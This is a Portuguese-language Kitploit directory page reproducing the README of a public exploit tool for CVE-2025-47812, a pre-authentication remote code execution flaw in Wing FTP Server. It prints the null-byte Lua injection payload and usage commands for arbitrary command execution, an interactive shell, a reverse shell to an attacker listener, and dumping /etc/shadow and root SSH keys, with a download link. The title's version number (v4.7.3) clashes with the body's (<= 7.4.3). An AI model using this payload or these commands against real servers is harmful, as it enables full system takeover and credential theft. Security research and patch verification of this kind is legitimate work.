Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-47812 — RCE para WingFTP v4.7.3 | Kitploit
Ferramentas/GitHubGitHub/popyue/cve-2025-47812
ExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubpopyue/cve-2025-47812

CVE-2025-47812

RCE para WingFTP v4.7.3

Ver Repositório
há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-47812 — RCE não autenticado no Wing FTP Server

root@kitploit:~
 ██╗    ██╗██╗███╗   ██╗ ██████╗     ███████╗████████╗██████╗
 ██║    ██║██║████╗  ██║██╔════╝     ██╔════╝╚══██╔══╝██╔══██╗
 ██║ █╗ ██║██║██╔██╗ ██║██║  ███╗    █████╗     ██║   ██████╔╝
 ██║███╗██║██║██║╚██╗██║██║   ██║    ██╔══╝     ██║   ██╔═══╝
 ╚███╔███╔╝██║██║ ╚████║╚██████╔╝    ██║        ██║   ██║
  ╚══╝╚══╝ ╚═╝╚═╝  ╚═══╝ ╚═════╝     ╚═╝        ╚═╝   ╚═╝

Visão Geral

CampoDetalhe
CVECVE-2025-47812
AfetadoWing FTP Server <= 7.4.3
CorrigidoWing FTP Server 7.4.4
CVSS10.0 (Crítico)
Autenticação necessáriaNenhuma (login anônimo é suficiente)
Privilégio obtidoroot (Linux) / NT AUTHORITY\SYSTEM (Windows)
Descoberto porJulien Ahrens (@MrTuxracer) — rcesecurity.com

Descrição da Vulnerabilidade

A interface web do Wing FTP Server é vulnerável a um ataque de execução remota de código em duas etapas, sem autenticação prévia.

Etapa 1 — Bypass de autenticação por byte nulo + injeção de código Lua

A função c_CheckUser() no binário do Wing FTP usa strlen() internamente, que trunca a string de nome de usuário no primeiro byte nulo (\x00). Isso significa que um nome de usuário como anonymous%00<arbitrary_data> passa na autenticação desde que anonymous (ou qualquer usuário válido) exista.

Após o sucesso da autenticação, loginok.html chama rawset(_SESSION, "username", username) usando o parâmetro POST completo e sem sanitização — incluindo tudo após o byte nulo. A sessão é então serializada para um arquivo de script Lua no disco via SessionModule.save().

Como a função de serialização envolve valores de string em literais de string longa do Lua [[...]] sem qualquer sanitização, injetar ]] no nome de usuário encerra o literal de string prematuramente, permitindo que código Lua arbitrário seja anexado ao arquivo de sessão.

Estrutura do payload:

root@kitploit:~
anonymous\x00]]
local h = io.popen("id")
local r = h:read("*a")
h:close()
print(r)
--

O -- final comenta o ]] que o Wing FTP anexa após o valor.

Etapa 2 — Acionamento via endpoint autenticado

O arquivo de sessão (nomeado com base no valor do cookie UID) é um script Lua que é executado via loadfile() + f() sempre que qualquer endpoint autenticado é acessado. Enviar POST /dir.html com o cookie UID executa o Lua injetado e retorna a saída do comando no corpo da resposta, antes do conteúdo <?xml.


Requisitos

  • Python 3.10+
  • requests, urllib3
root@kitploit:~
pip install -r requirements.txt

Uso

root@kitploit:~
usage: CVE-2025-47812 [-h] [-U USER] [-P PASS] [--vhost HOST] [--timeout N]
                      [--verify-ssl]
                      [--cmd CMD | --shell | --revshell | --dump]
                      [--lhost IP] [--lport PORT] [--listen]
                      target

Exemplos

root@kitploit:~
# Single command
python3 CVE-2025-47812.py http://ftp.target.com --cmd "id"
python3 CVE-2025-47812.py http://ftp.target.com --cmd "cat /etc/passwd"

# Target by IP (Wing FTP uses virtual-host routing — supply hostname with --vhost)
python3 CVE-2025-47812.py http://10.10.10.10 --vhost ftp.target.com --cmd "id"

# Interactive pseudo-shell
python3 CVE-2025-47812.py http://ftp.target.com --shell

# Reverse shell (start nc listener separately)
python3 CVE-2025-47812.py http://ftp.target.com --revshell --lhost 10.10.14.5 --lport 4444

# Reverse shell with built-in listener
python3 CVE-2025-47812.py http://ftp.target.com --revshell --listen --lhost 10.10.14.5 --lport 4444

# Dump sensitive files (/etc/passwd, /etc/shadow, Wing.cfg, root SSH key)
python3 CVE-2025-47812.py http://ftp.target.com --dump

# With non-anonymous credentials
python3 CVE-2025-47812.py http://ftp.target.com -U ftpuser -P secret --cmd "whoami"

Correção

Atualize o Wing FTP Server para a versão 7.4.4 ou posterior.


Referências

  • Writeup original: https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
  • Relacionados: CVE-2025-47811 (privilégios de serviço excessivamente permissivos), CVE-2025-47813 (divulgação de caminho via cookie UID muito longo)

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e testes de penetração autorizados. Executar este exploit contra sistemas que você não possui ou para os quais não tem permissão explícita por escrito para testar é ilegal e antiético. O autor não assume nenhuma responsabilidade por qualquer uso indevido.

Baixar ferramenta